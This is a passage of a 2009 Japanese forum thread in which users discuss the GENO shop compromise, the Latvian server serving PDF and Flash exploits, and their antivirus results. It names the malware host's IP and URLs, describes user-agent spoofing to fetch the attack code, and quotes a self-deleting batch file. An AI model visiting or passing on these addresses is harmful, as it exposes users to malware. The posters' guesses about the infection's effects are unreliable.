その後UAを色々偽装して試した結果、ラトビアのサーバが攻撃コードを吐き出すのは
Windows 2000、XP (Me以前は試してない) に限定されるみたい。
Vista、Mac、Linuxに関しては>>572に書いたコードを吐くだけで、何も悪さをしない。

2kとXPに関してはIEとそれ以外のブラウザをサーバ側で判別、
それぞれに対して>>580のように攻撃用pdf/swfを呼び出す。
そんな仕様になっているっぽい

777 : 節分草(埼玉県):2009/04/05(日) 20:38:15.04 ID:FHpZuu8m
>>772
ちなみにノートン先生再インスコしてもだめ
もし復元ができなかったらあきらめてOS入れ直せ

778 : マムシグサ(茨城県):2009/04/05(日) 20:40:24.78 ID:ZsqI05SR
>>776
マジで?
つまりVista大勝利?!

779 : ムラサキケマン(アラバマ州):2009/04/05(日) 20:41:05.89 ID:URFZ3t0d
>>776
XPSP3
IE8
janeから開いたけどpdf、swfは出てこなかった
94.247.2.195/news/?id=2

780 : ジョウシュウアズマギク(長屋):2009/04/05(日) 20:45:00.35 ID:eYgQ49eq
貧乏人のXP厨涙目wwwwwwwwwwwwwwwww

781 : カラタネオガタマ(山陰地方):2009/04/05(日) 20:46:06.40 ID:05J70V8e
>>776
ちょっとサブ機(vista)で踏んでこようとか思っちゃったじゃねーかw

782 : サイネリア(東京都):2009/04/05(日) 20:46:50.37 ID:Z9rJC4ry
93.184.71.21
踏んでないのになんかスロバキアと通信してるんだが

783 : ナノハナ(長屋):2009/04/05(日) 20:46:59.83 ID:wCjwU9cE
4月からバスターからウイルスキラーゼロに変えといてよかったよ。

784 : ナガバノスミレサイシン(東京都):2009/04/05(日) 20:49:01.49 ID:zsJN3Alo
オペラやスリッパ(だっけ)使ってる情弱どもざまあwwwwww
玄人はファイアフォックス一択

785 : ローダンゼ(埼玉県):2009/04/05(日) 20:49:38.60 ID:OriMR3ig
>>776
俺Vistaだから平気だったのか

786 : シハイスミレ(神奈川県):2009/04/05(日) 20:49:52.01 ID:BDzFLV4T
>>782
IPアドレス 93.184.71.21
ホスト名 um10.eset.com
IPアドレス割当国 スロバキア ( sk )

787 : ハマナス(コネチカット州):2009/04/05(日) 20:51:15.09 ID:uVA9mQjx
これって踏んだら外付けHDDもやばい?あと2階だから無線LANで繋げてたんだが1階にあるPCとかには危険ないの?

788 : サイネリア(東京都):2009/04/05(日) 20:51:30.11 ID:Z9rJC4ry
ああESETかサンクス

789 : エニシダ(群馬県):2009/04/05(日) 20:52:27.66 ID:Ca48GkkG
>>788
東欧無修正かコラ

790 : パンジー(大阪府):2009/04/05(日) 20:53:32.04 ID:RPf1heEL
>>787
よう俺www

791 : 雪割草(千葉県):2009/04/05(日) 21:09:10.01 ID:G7xhjdZ4
グーグルクロームは安全?

792 : 藤(神奈川県):2009/04/05(日) 21:13:04.18 ID:7VElRfeM
>>791
危険

793 : スカシタゴボウ(静岡県):2009/04/05(日) 21:14:32.99 ID:GCfDmmEM
クロームなんか使ってる奴バカだろ
何抜かれてるかわからん

794 : クサノオウ(東京都):2009/04/05(日) 21:16:37.72 ID:KCvDZWRj
Vista厨大勝利ってのはマジなんだろうな

795 : ムシトリナデシコ(北海道):2009/04/05(日) 21:17:26.47 ID:MzeVYkNj
>>779
ちょっと試してみたけどやっぱり攻撃コードを吐いてくるね
ただIE6 on 2k上でも読み込みに失敗していたようだから、jsは読み込んでもpdf/swfは読み込まないってことはあるかも
user agentがどうなってるか確認できる?

796 : ジロボウエンゴサク(東京都):2009/04/05(日) 21:19:46.89 ID:wHrlagvV
avastですら反応するのに・・・

797 : カントウタンポポ(大阪府):2009/04/05(日) 21:20:32.13 ID:ELJz1ZXf
おまえら、インターネットオプションのセキュリティで、
制限付きサイトに、ttp://www.geno-web.jp/を登録する作業に戻るんだ!

798 : パキスタキス(アラバマ州):2009/04/05(日) 21:22:02.76 ID:fI6jsCMH
ここまで放置だと宣伝のためにわざとウイルス仕込んだ疑いがあるな

799 : パキスタキス(アラバマ州):2009/04/05(日) 21:23:14.53 ID:fI6jsCMH
通信をコマンドぷろんとで確認したが特に怪しいことはしてなかった。最新のフラッシュとadobeだったからかお??

800 : ムラサキケマン(アラバマ州):2009/04/05(日) 21:23:51.99 ID:URFZ3t0d
>>795
よくわからないけど、これのこと?
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Internet Explorer 8.0
Mozilla It's a Mozilla based browser
4.0 Mozilla Version
compatible Compatibility flag
Indicates that this browser is compatible with a common set of features
MSIE 7.0 Name :
Internet Explorer
Version = 7.0 (MSIE 8.0 in Compatibility View)
Windows NT 5.1 Operating System:
Windows XP
Trident Layout engine for the Microsoft Windows version of Internet Explorer.
4.0 version 4.0
.NET CLR 2.0.50727 .NET installed
Version : 2.0.50727
.NET CLR 3.0.4506.2152 .NET installed
Version : 3.0.4506.2152
.NET CLR 3.5.30729 .NET installed
Version : 3.5.30729


801 : シナノナデシコ(神奈川県):2009/04/05(日) 21:24:35.57 ID:MhOeLfLE
avast反応するけど、1発目は感染!?

802 : ナニワズ(アラバマ州):2009/04/05(日) 21:26:19.56 ID:yMf1kKpb
最近よくgenoスレ立ってたしな。

803 : バイカカラマツ(アラバマ州):2009/04/05(日) 21:27:05.64 ID:S8oHF/OE
>>799
ニヤニヤ

804 : キクザキイチゲ(東日本):2009/04/05(日) 21:27:49.90 ID:MRFRGNV7
マゾ的には放置中のIE6を再度起動させてフリーズ中のIEをそのままにして netstat -nb してみたら、
ccSvcHst.exe が起動して 198.87.182.147 :80 につなげていた。こりゃかんけいないか。

805 : バイカカラマツ(アラバマ州):2009/04/05(日) 21:29:43.37 ID:S8oHF/OE
>>804
それアカマイさんですよ

806 : コデマリ(千葉県):2009/04/05(日) 21:30:24.46 ID:9Adf0bya
>>802
うんうん。

正直、最近不自然な位にGeno宣伝レスが多かった。
なんかその辺にもカラクリが在りそう。

ぶっちゃけ、あの程度の店の規模で
広告代理店を使ってネットで宣伝活動を行える余裕なんてない筈だし。

一見店側の工作員に見せかけたクラッカー集団の感染者拡大の為の似非宣伝レス活動って感じで。
相当計画的犯行なんだと思う。

807 : シハイスミレ(神奈川県):2009/04/05(日) 21:30:49.77 ID:BDzFLV4T
>>804
ノートンじゃん

808 : キクザキイチゲ(東日本):2009/04/05(日) 21:31:46.05 ID:MRFRGNV7
あぁ、先生のかw 失敬

809 : アグロステンマ(千葉県):2009/04/05(日) 21:32:03.02 ID:uDBzE6A2
この時に踏んじゃったけど大丈夫だったようだ

CPU C2D T7250、 Vista Businessの15.4型NEC製ノートPCが46000円
http://tsushima.2ch.net/test/read.cgi/news/1238662017/l50
1 名前: カリフォルニア(福島県) 投稿日:2009/04/02(木) 17:46:57.91 yQG9LCm1 ?

810 : チドリソウ(福岡県):2009/04/05(日) 21:34:20.37 ID:UF/PcuEl
昨夜短縮URLで貼られまくってたから結構被害出てるかもな。

811 : スズメノヤリ(愛知県):2009/04/05(日) 21:35:06.09 ID:YhBqCRka
踏んでしまったサブ機(バスター最新)で検出されなかったんで、
a-squaredで調べたら高レベル危険度で検出。
ああマンドクセ

しかも直ぐ入金したのに↓届かず発送メールも無い。
CPU C2D T7250、 Vista Businessの15.4型NEC製ノートPCが46000円

812 : フデリンドウ(東京都):2009/04/05(日) 21:36:56.19 ID:Pt0pslUH
>>776
UAに
compatible; MSIE 7.0; Windows NT 6.0;
を送って
94.247.2.195/news/?id=100
をGETリクエストしてみたが、id=2とid=3への誘導コードが入ってたよ。
Vistaだからといって安心はできないんじゃない?

813 : シナノコザクラ(関西地方):2009/04/05(日) 21:37:50.90 ID:PJg+3svG
>>811
genoは平日でも入金から発送まで2日以上がデフォ&土日休む
で4/2(木)に注文したんなら月〜水あたりに発送だ

814 : ボロニア・ピンナタ(福岡県):2009/04/05(日) 21:38:59.97 ID:l4/7N6fi
なんかこのスレいるだけで、アンチウイルスソフトの優秀さが比較できるな。
しかし、無料のavastが大勝利ってマカフィー使ってるのが悲しくなってくる

815 : ユッカ(岡山県):2009/04/05(日) 21:39:13.39 ID:hpRAds5S
>>811
そりゃ心配だね、明日でも直接電話してみたら?

816 : イワウチワ(西日本):2009/04/05(日) 21:41:34.29 ID:hPqD5s7R
>>814
一例だけじゃわからんよ

817 : イヌガラシ(北海道):2009/04/05(日) 21:42:03.42 ID:EePk2v0W
>>800
それ。
試してみたがやっぱり攻撃コードが返ってくるようだ。
まだコードをよく検証してないが明示的に読み込まれるわけではないかもしれないので気をつけた方がいいかも

818 : ジョウシュウアズマギク(群馬県):2009/04/05(日) 21:42:24.03 ID:bd43wRI+
で結局感染するとどうなるんだい?

819 : スズメノヤリ(愛知県):2009/04/05(日) 21:43:19.74 ID:YhBqCRka
もう踏んだり蹴ったりっすわ。
サブ機はwinも最新にしてて、変なサイトは絶対行かないマシンなんで、
ライセンス余ってたバスターでいいやって入れたらすり抜けちまってこれだよ。

感染上等のエロサーバーはavastで助かりやがるし・・・

820 : シロイヌナズナ(京都府):2009/04/05(日) 21:43:44.68 ID:eWJHWMwy
これ踏んだ後Windows Updateできなくなったやついる?
割れでもない普通のXPなんだがうpだて出来なくなってる…
サービスが起動してないっていうから見てみたけど起動してるし…

821 : ヒメオドリコソウ(北海道):2009/04/05(日) 21:44:55.01 ID:7h0y+O94
Vistaで感染したってやついる?

822 : コデマリ(千葉県):2009/04/05(日) 21:47:29.65 ID:9Adf0bya
>>818
これまでのレスを超簡単に取りまとめると、、、

1.最新ではないAcroBatReaderのバージョン8がインスコされているとPC内にPDFがわんさか増殖してHDDを食いつぶす。
2.その際にCPU負荷がとんでもない状況になってブラウザが落ちたり操作不能でリセットボタンを「ぽちっとな」する羽目に。
3.OS再起動するとブルースクリーンになり再インスコする羽目に。

823 : 菜の花(愛媛県):2009/04/05(日) 21:47:33.89 ID:SXYeZps5
URL踏んだがどうってことない。

824 : アメリカヤマボウシ(富山県):2009/04/05(日) 21:48:37.16 ID:qHl/Fgrx
いつになったらこのウイルスの情報でるかな?
とりあえずa-squaredでスキャンしたら大丈夫だろうか・・・
これが解決するまでamazon使えねえ

825 : キンカチャ(東京都):2009/04/05(日) 21:48:49.80 ID:OKJNscTo
AcroBatReader入れてなかったわ
入れてから開いてくる

826 : モリシマアカシア(catv?):2009/04/05(日) 21:49:23.39 ID:Leyemum6
俺なんかIE6で止めてたのに
GENO見たらフリーズして再起動したらIE7にされてたぜ。
WU以外は使わないからどっちでもいいっていやいいんだけど。

827 : サンダーソニア(関西地方):2009/04/05(日) 21:50:14.46 ID:zJgJSWG+
Spybotだと検出できるかな?
普段からJavaScriptは切っておくのが安全なんだな

828 : スズメノヤリ(愛知県):2009/04/05(日) 21:50:49.99 ID:YhBqCRka
念の為、対応してるソフトでスキャンかけた方が良いぞ。


829 : イモガタバミ(北海道):2009/04/05(日) 21:51:24.78 ID:F4ogAJ6W
>>812
それなんだが、どうやら最初にラトビア鯖へアクセスしたUAとIPアドレスを紐付けて管理しているみたい。
なので同一IPでアクセスしている場合、その後どうUAを偽装しようが同じコードが返ってくる。
俺のIDがコロコロ変わっているのもその関係。
UA変えた後同じIPでアクセスしてないか?

830 : アメリカヤマボウシ(富山県):2009/04/05(日) 21:51:25.52 ID:qHl/Fgrx
>>827
やってみたけど、クッキーしか出なかったよ

831 : 節分草(catv?):2009/04/05(日) 21:51:37.44 ID:XV6tShH1
avast導入
といってもなにをしたらいいかわからないわ

832 : ツメクサ(アラバマ州):2009/04/05(日) 21:52:30.81 ID:2WZEeT4/
vistaだけど何を持って感染というのか分からんから
即イメージから復元したよ

短い間だが俺が気付いた事っつったら
HDDとCPUが継続して使用状態になってた
HPアクセス時にノートンに許可や遮断ログが色々書き込まれてた
ラトビアIPとの通信ログがあった

こんなもんだな、変なプログラムは見当たらなかったよ

833 : スズメノヤリ(愛知県):2009/04/05(日) 21:52:35.30 ID:YhBqCRka
原子力マークが出るまで待つだけ。

834 : オオイヌノフグリ(アラバマ州):2009/04/05(日) 21:52:42.25 ID:0x6e4xpu
こないだここで買ったノーパソのアダプターにPSE入ってなかったんだけど、
要らなくなってヤフオクで売ったら俺捕まる?

835 : キブシ(長屋):2009/04/05(日) 21:52:49.16 ID:UuFj6r6c
まあ一ついえることは二度とgenoにアクセスすることは無いw

836 : 斑入りカキドオシ(東京都):2009/04/05(日) 21:53:51.68 ID:1gL41SgP
お前ら結構geno知ってるんだな

837 : プリムラ(岡山県):2009/04/05(日) 21:54:56.10 ID:K85pVQ7U
しかし、誰がしたのかも不明なのがな・・・・。

838 : スズメノヤリ(愛知県):2009/04/05(日) 21:55:16.95 ID:YhBqCRka
新聞やらアスキー流れの初心者は気付いてすらいない気ガス。



839 : ヒメマツムシソウ(神奈川県):2009/04/05(日) 21:55:18.81 ID:ir1Myk9p
まだ直ってないとかクズにも程がある

840 : ジョウシュウアズマギク(東日本):2009/04/05(日) 21:55:36.33 ID:cMOqdWaO
>>834
罰金一億えん。
中古は除く。

841 : サンダーソニア(関西地方):2009/04/05(日) 21:55:55.90 ID:zJgJSWG+
>>830
dクス
やっぱり対応したソフトを入れないとダメか

842 : ケブカツルカコソウ(長屋):2009/04/05(日) 21:56:39.26 ID:mKOwqBaN
ゲノの鯖缶はやる気あるの?基地外なの?

843 : サイネリア(dion軍):2009/04/05(日) 21:57:40.18 ID:3fnFEon2
サクセスみたいに夜逃げするんじゃ・・・

844 : サイネリア(アラバマ州):2009/04/05(日) 21:58:10.79 ID:l1Vd3agq
月曜日おおわらわだろうなw

845 : クロッカス(中部地方):2009/04/05(日) 22:00:26.84 ID:Szj0XPum
もっと伸びてないとおかしいスレなのになんで★2なの?もっと問題に
なるべきだろこれ。それとも明日から急に加速すんのかな?

846 : ハナズオウ(長屋):2009/04/05(日) 22:00:52.60 ID:9IJRahAJ
a-squaredで調べてみたら
\windows\umplyxoolに感染してた

847 : オキナグサ(アラバマ州):2009/04/05(日) 22:01:22.45 ID:kvkquIi3 ?PLT(14437)

>>845
これと言った被害が無いからだろ

848 : コデマリ(千葉県):2009/04/05(日) 22:01:45.27 ID:9Adf0bya
>>845
Faithとか1’sだと軽く★20位逝ってたと思うw

849 : ムラサキケマン(アラバマ州):2009/04/05(日) 22:03:04.64 ID:URFZ3t0d
>>817
もう警戒しない気になれないぜ・・・もう怪しいURL踏まない

850 : パンジー(大阪府):2009/04/05(日) 22:04:07.42 ID:RPf1heEL
糞古いノート使ってるんだが、ネットにつなぐと問題が起こったとかでるんだけど、何なのこれ
終了ですか?

851 : スズメノヤリ(愛知県):2009/04/05(日) 22:05:25.59 ID:YhBqCRka
PC一台しかない香具師は現在リカバリ中だろうから、明日辺りからが修羅場だな。

852 : コデマリ(千葉県):2009/04/05(日) 22:06:07.67 ID:9Adf0bya
>>851
あ、そーいう奴も隠れて多いのかも知れないね。

853 : シハイスミレ(神奈川県):2009/04/05(日) 22:06:45.93 ID:BDzFLV4T
>>850
投げ捨ててGenoで新しいの買えw

854 : オオタチツボスミレ(新潟県):2009/04/05(日) 22:06:46.66 ID:gup1CDf2
>>23
これらだったらどれを使っても今回のウイルスもチェック可能?

855 : サイネリア(catv?):2009/04/05(日) 22:06:56.71 ID:PvyV0pvn
会社でやっちまったら困るよな
自宅マシンでまだよかったか?

856 : モリシマアカシア(catv?):2009/04/05(日) 22:07:36.07 ID:Leyemum6
やっぱブラウザは家にしろ火狐にしろオペラにしろUSBからポータブル系使うに限るな。

857 : デージー(長崎県):2009/04/05(日) 22:08:46.61 ID:C91/DZ60
>>853
それがGenoの狙いでは…?
このウイルス騒ぎで知名度上げて

858 : ユッカ(岡山県):2009/04/05(日) 22:08:49.96 ID:hpRAds5S
>>851
PC一台でも携帯から書き込むのでは?

859 : シハイスミレ(神奈川県):2009/04/05(日) 22:08:50.70 ID:BDzFLV4T
ところで↓と同じ状態の奴いる?

536 名前: SM-3(茨城県)[sage] 投稿日:2009/04/05(日) 01:15:16.14 ID:0Dln3hZK
ルートにu.batってのが作られてたorz
中身は以下のとおり

:Z
DeL "K:\_.t"
IF EXIST "K:\_.t" GOTO Z
DeL "K:\u.bat"

こことは関係ないかもしれんが何かにやられたのか確実だorz

860 : スズメノヤリ(愛知県):2009/04/05(日) 22:08:56.37 ID:YhBqCRka
プニルで見事に爆死した漏れも火狐に乗り換えるかね。
イマイチなれんのよね。

861 : ジシバリ(千葉県):2009/04/05(日) 22:09:16.97 ID:WIH8GAq3
>>846
なんて名前で引っかかるんだ?

862 : サイネリア(dion軍):2009/04/05(日) 22:09:19.80 ID:3fnFEon2
>>857
信用は最悪だろw

863 : タチイヌノフグリ(福岡県):2009/04/05(日) 22:09:23.67 ID:fPoRIsOp
>>854
カスペルスキーがおすすめ

864 : アマリリス(アラバマ州):2009/04/05(日) 22:10:03.40 ID:p1i6EYrA
狐でもjs有効だと駄目だぜ

865 : コデマリ(千葉県):2009/04/05(日) 22:10:15.57 ID:9Adf0bya
>>855
会社のPCで踏んで食らったら普通に始末書レベルだよね。

例えショッピングサイトとはいえ、私用でWebで遊んでたのがバレバレだもの。
会社の備品購入ならもっとまともな店から買うはずだし。

こんな店で買うなんて書いたら稟議書通らないだろw

866 : オオタチツボスミレ(新潟県):2009/04/05(日) 22:10:22.60 ID:gup1CDf2
>>863
d

867 : スズメノヤリ(愛知県):2009/04/05(日) 22:12:08.57 ID:YhBqCRka
漏れのCore2ノート届くのかねぇ・・・orz

868 : コデマリ(千葉県):2009/04/05(日) 22:12:16.61 ID:9Adf0bya
>>861
ファイル名とフォルダ名はランダムだと思うから
名称を聞いても意味無いんじゃないのかな。
その中にEXEファイルとPDFファイルが居るかどうかが問題なのかと。

869 : ミヤコワスレ(埼玉県):2009/04/05(日) 22:12:18.89 ID:Hdb5g1AO
大半はブラウザ強制終了されておかしいな、と思うくらいな気がする
何か仕込まれていると気づいても、実害があるのかどうかわからんという
俺みたいなのも結構いるんじゃないかなぁ

変な実行ファイルは見あたらないし、バックドア仕込まれている様子もないから
とりあえず様子見するしかない

でも長期間サイト放置しているGENOは許せないな
もうここじゃ買い物できない

870 : ハナズオウ(長屋):2009/04/05(日) 22:12:54.56 ID:9IJRahAJ
>>861
>>198

871 : 桜(静岡県):2009/04/05(日) 22:12:54.78 ID:feTrCbuR
GENOを引きずり落とそうとするライバル業者の書き込みが目立つスレですね

872 : 藤(神奈川県):2009/04/05(日) 22:13:47.24 ID:7VElRfeM
>>871
>>871
>>871
>>871

873 : コデマリ(千葉県):2009/04/05(日) 22:14:42.10 ID:9Adf0bya
>>869
なんかクラッキングされたスクリプトにはFlashの脆弱性を付いたのも書かれているみたいだけど、
結局Flash関連の現象が報告されないって事は
その前のPDFの処理だけでCPU負荷が上がりまくって落ちちゃうからなのかも知れないね。


874 : オキザリス(長野県):2009/04/05(日) 22:14:43.00 ID:Vj2WlaeD
>>871
Genoが勝手に落ちてっているだけ。もともと評判よくは無いのに…

875 : オオタチツボスミレ(新潟県):2009/04/05(日) 22:14:56.82 ID:gup1CDf2
カスペルスキー「Meですか・・・ごめんなさい」

 。・゚・(ノ∀`)・゚・。

876 : 桜(静岡県):2009/04/05(日) 22:16:25.46 ID:feTrCbuR
>>869とか露骨
もう買わないとか、その手の書き込みはすべて業者

877 : アルストロメリア(千葉県):2009/04/05(日) 22:16:37.04 ID:ilYpXZIZ ?2BP(433)

>>873
ウイルス作者のミスだなw

878 : ラフレシア(埼玉県):2009/04/05(日) 22:16:55.31 ID:+d5orXjt
>>874
ジェノなのにGEOが有名なせいでゲノゲノ言われてなぁー


879 : カントウタンポポ(大阪府):2009/04/05(日) 22:17:28.85 ID:ELJz1ZXf
Geno社員が、個人情報満載の事務用PCで
「今日のうちのHPのネタはっと・・・」カチカチッ

おめでとうございます。おまいらの情報はめでたくツコウタされました。

880 : オキナグサ(アラバマ州):2009/04/05(日) 22:17:48.84 ID:kvkquIi3 ?PLT(14437)

だからよ、お前ら本当にウイルス仕込まれたの?

881 : 菜の花(福岡県):2009/04/05(日) 22:17:58.47 ID:CMFaaahW
>>877
まさにウィルスミスだな

882 : メギ(東京都):2009/04/05(日) 22:18:05.86 ID:4k4u1rhq
>>878
?

883 : ミゾコウジュミチノクコザクラ(catv?):2009/04/05(日) 22:18:50.49 ID:O0NRBbv3
>>881
ほほう・・・

884 : ジシバリ(千葉県):2009/04/05(日) 22:18:51.31 ID:WIH8GAq3
>>868
いや だから聞きたいのは引っかかったウイルスの名前さ

885 : フデリンドウ(東京都):2009/04/05(日) 22:19:30.70 ID:Pt0pslUH
>>829
なるほど、そういうことか。
ウィルスにやられた人の情報とかも収集してそうだな。

886 : クレマチス・モンタナ(関東・甲信越):2009/04/05(日) 22:19:45.73 ID:oy9irtQO
>>881だれうま

887 : コデマリ(千葉県):2009/04/05(日) 22:20:31.64 ID:9Adf0bya
>>877
また昨夜の貴様か。

fack you


888 : アグロステンマ アゲラタム(長屋):2009/04/05(日) 22:20:53.58 ID:jKNt2PLz
687 名前: ◆N9P3SuvBPo [sage] 投稿日:2009/04/05(日) 22:08:16
俺今な、そのgenoのトップやiframeで読み込まれるアンケートページ
問題の数字から始まるアドレスとかを、表示したけどみんなが言ってるようなことは起きませんぞ?

OSはWindowsXPSP2で、WindowsUpdateも購入時の状態からやってないし、
ウイルス対策ソフトも入れてないし、おまけにブラウザはIE6SP2だし、
この環境だと、誰がどう見ても間違い無く、そのページを開いて時点でフリーズして終了ってことですよね?

誰でも良い、仮想PC持ってる人いたら検証してくれ!!

889 : オオタチツボスミレ(新潟県):2009/04/05(日) 22:20:59.53 ID:gup1CDf2
このウイルスでPCが壊れたりはしない?
今までと同じように使えるなら別に気にしないけど。

890 : シャクヤク(catv?):2009/04/05(日) 22:21:22.19 ID:8zDi2DaF
>>881
!!

891 : 藤(神奈川県):2009/04/05(日) 22:21:38.06 ID:7VElRfeM
>>889
普通に壊れるじゃん

892 : コデマリ(千葉県):2009/04/05(日) 22:21:39.66 ID:9Adf0bya
>>881
おまい、才能あるな。

893 : コデマリ(千葉県):2009/04/05(日) 22:22:20.51 ID:9Adf0bya
>>884
あ、そっちか。すまんな。

894 : ラフレシア(埼玉県):2009/04/05(日) 22:22:20.78 ID:+d5orXjt
>>877
ウイル・スミス
なんちゃってーカクカクカクカクカク

895 : ハナズオウ(長屋):2009/04/05(日) 22:22:25.66 ID:9IJRahAJ
コマンドプロンプト開こうとしても開けない・・・・
explorerが落ちる

896 : カラスノエンドウ(富山県):2009/04/05(日) 22:23:01.09 ID:YXJ3v3p5
>>881


897 : ミゾコウジュミチノクコザクラ(catv?):2009/04/05(日) 22:23:35.70 ID:O0NRBbv3
やっぱインターネッツは恐ろしいぜHAHAHA!!

898 : オステオスペルマム(静岡県):2009/04/05(日) 22:24:15.77 ID:mvkK0dTv
HAHAHA

899 : サイネリア(神奈川県):2009/04/05(日) 22:24:39.73 ID:guiixNmg
カスペたんありがd(´・ω・`)

http://94.247.2.195/jquery.js Internet Explorer 遮断しました: Trojan-Downloader.JS.Agent.dwf


900 : オウレン(アラバマ州):2009/04/05(日) 22:25:26.03 ID:AH/LHrR5
>>820
IEが暴走して固まる

901 : ミヤコワスレ(埼玉県):2009/04/05(日) 22:26:49.37 ID:Hdb5g1AO
>>873
確かにあっという間にメモリ食いまくって落ちたから実害なかったのかもしれんね

>>876
買うとか買わないとか書き込みすると、すぐに業者とかいわれるんだなw
ここじゃあまり買ったことはないけど、販売リスト眺めるのは好きだったよ

902 : タニウズキ(兵庫県):2009/04/05(日) 22:27:24.39 ID:Y2tqwgL9
>>875
>>365

903 : ロウバイ(岩手県):2009/04/05(日) 22:27:41.42 ID:RSmRKrFm
>>889
「利用する 便利じゃん」ですね。わかりま(´・ω・)ス

904 : センダイハギ(アラバマ州):2009/04/05(日) 22:31:43.75 ID:RAIzys/v
昨日開いたけど何も起こらなかったな。Readerも起動しなかったし、なんなだろ。

905 : カキツバタ(アラバマ州):2009/04/05(日) 22:32:08.84 ID:qIasrM2X
a-squaredで調べたら問題なかったんだが
今度はa-squaredのプロセスが常駐してウザい

906 : オウレン(アラバマ州):2009/04/05(日) 22:32:50.50 ID:AH/LHrR5
>>880
昨日の夜感染した
IEが負荷かかって落ちる
AVGの更新ができない
アップデートもIEが固まってできない

最初メモリがいかれたかと思ったんだけど
復旧で直った
あとはあす調べてみる

907 : プリムラ(岡山県):2009/04/05(日) 22:33:22.45 ID:K85pVQ7U
>>895
同じ事なって、1日前に修復したらなおったけど、
この件がきっかけだったら・・・・。

908 : サイネリア(東京都):2009/04/05(日) 22:33:38.92 ID:Wtu0Z/3+
>>806
旦那が脱税ババア氏ね

909 : オオタチツボスミレ(新潟県):2009/04/05(日) 22:34:05.06 ID:gup1CDf2
>>902
d

910 : オウレン(アラバマ州):2009/04/05(日) 22:34:54.95 ID:AH/LHrR5
>>895
システムの復旧で直る
ウイルスが消えたかどうかかわからないけどね

911 : イモガタバミ(北海道):2009/04/05(日) 22:41:55.41 ID:F4ogAJ6W
多分flashの方は9.0.115.0以前に存在する脆弱性をつくもの
9.0.124以上であれば問題ないと思われる

912 : クリサンセコム・ムルチコレ(コネチカット州):2009/04/05(日) 22:43:54.89 ID:jisCmmPw
>>856
関係あんの?


913 : ハナズオウ(長屋):2009/04/05(日) 22:46:52.27 ID:9IJRahAJ
>>907>>910 ありがとうございます

914 : ヒメオドリコソウ(北海道):2009/04/05(日) 22:49:01.62 ID:7h0y+O94
おまえらはやく本社に文句言いに行けよ
ここに地図のってっから後は頼むな
http://www.geno.co.jp/access/map.php

915 : アルストロメリア(千葉県):2009/04/05(日) 22:49:12.64 ID:ilYpXZIZ ?2BP(433)

月曜まで放置だから2chとか見てない奴の被害がどんどん拡大するw
鬼畜企業だな〜w

916 : チドリソウ(関西地方):2009/04/05(日) 22:50:47.70 ID:vpDKG2/i
昨日、GENO見ててFirefoxが落ちるなぁと思ったが、感染してたのかな。
今日の昼も見てたんだが・・・。
ウイルスバスターで検索かけてるが、今のところ何にも出てこない。
感染した場合の判別方法がはっきりしてないから、どうしようもなくてただ見てるだけ。

917 : サイネリア(dion軍):2009/04/05(日) 22:51:40.98 ID:3fnFEon2
>>916
カスペ入れてスキャンしろ

918 : アルストロメリア(北海道):2009/04/05(日) 22:52:52.59 ID:bn8j3/Lf
踏んでからクリーンインストールで余裕でした

919 : 藤(神奈川県):2009/04/05(日) 22:52:59.64 ID:7VElRfeM
>>916
だからVBじゃ検出されないって

920 : アマリリス(アラバマ州):2009/04/05(日) 22:53:49.34 ID:tK/mf1dd
>>887
oh...miss spell

[Fuck you]

921 : スズメノヤリ(愛知県):2009/04/05(日) 22:54:21.20 ID:YhBqCRka
そもそも有料ソフトで拾えないとかクソ過ぎる。

922 : コデマリ(千葉県):2009/04/05(日) 22:55:17.33 ID:9Adf0bya
>>920
I understand.

>>908
Fuck you

923 : クモイコザクラ(関西地方):2009/04/05(日) 22:55:18.24 ID:29HoiJRo
>>921 禿同  もう金原ってんのが馬鹿馬鹿しい


924 : ショウジョウバカマ(東京都):2009/04/05(日) 22:55:19.35 ID:HvXPLNzh
firefoxなら落ちなかった。

925 : クレマチス・モンタナ(神奈川県):2009/04/05(日) 22:55:22.05 ID:dLBkDiis
新作ウイルスってところがちょっと盛り上がってる原因だな 
あとはgenoの無責任放置っぷりか

926 : プリムラ・インボルクラータ(北海道):2009/04/05(日) 22:55:29.38 ID:tk/Bpcwv
キングソフトが対応したみたいだな

927 : イベリス・ウンベラタ(徳島県):2009/04/05(日) 22:56:37.38 ID:qBMLTRpS
>>910
システムの復元で4/2にしたよ。ありがとー。

928 : プリムラ・インボルクラータ(北海道):2009/04/05(日) 22:56:59.37 ID:tk/Bpcwv
完全無料のキングソフトですら対応してるのにw
ちゃんねらー利用率高いから当たり前か?
http://www.kingsoft.jp/

929 : センダイハギ(アラバマ州):2009/04/05(日) 22:57:52.84 ID:RAIzys/v
なんだ、FlashとReaderを最新にしてれば感染しないじゃん。つまらん。

930 : オオタチツボスミレ(関西・北陸):2009/04/05(日) 22:58:28.97 ID:iqwnWZXf
ノートン2007で勝てる相手なのか?それが知りたい。

931 : ショウジョウバカマ(関西地方):2009/04/05(日) 22:58:47.08 ID:oRHbHxmQ
XP SP3でIE6で見てフリーズ。
カスペでチェックしたけど何もでない。
しかし、踏んでしまっただけに気になる。

これって結局、目的はボットの作成だろ。
acrobatかflashの脆弱性をついてバックドアを
開けといて後から使うつもりなんじゃないの?


932 : 節分草(埼玉県):2009/04/05(日) 22:59:42.82 ID:FHpZuu8m
>>930
惨敗

933 : コデマリ(千葉県):2009/04/05(日) 23:01:03.44 ID:9Adf0bya
>>931
前スレではスパムメール鯖がポートを突っついてきたなんてレスもあったんで、
恐らく放置しておくと踏み台とかそんな感じで使われちゃうんだと思う。

934 : オオタチツボスミレ(関西・北陸):2009/04/05(日) 23:01:23.49 ID:iqwnWZXf
>>932
強敵じゃないか!

935 : 斑入りカキドオシ(山梨県):2009/04/05(日) 23:02:16.28 ID:YrgCdLng


936 : チドリソウ(関西地方):2009/04/05(日) 23:03:19.89 ID:vpDKG2/i
>>919
>>198にTrendMicroの文字があるけど、これじゃ駄目ってこと?
あと昨日の午前3時くらいにアクセスしたPCもあって、Avastが入ってたんだけど念のため検索中。

>>919>>917も、はっきりと言ってくれてありがたい。
カスペルスキー入れてくる。。

937 : シャクヤク(千葉県):2009/04/05(日) 23:03:47.36 ID:vu3s2jT4
仮想環境で踏んでくる ノシ

938 : 藤(神奈川県):2009/04/05(日) 23:06:44.16 ID:7VElRfeM
>>936
http://pc11.2ch.net/test/read.cgi/pc/1237696091/564
http://pc11.2ch.net/test/read.cgi/pc/1237696091/576
あとここの>>122

939 : オオジシバリ(東京都):2009/04/05(日) 23:07:15.93 ID:vaK3oDFz
>>627
もしかしてそのHPがgeno?
かあああああああああああああああああ
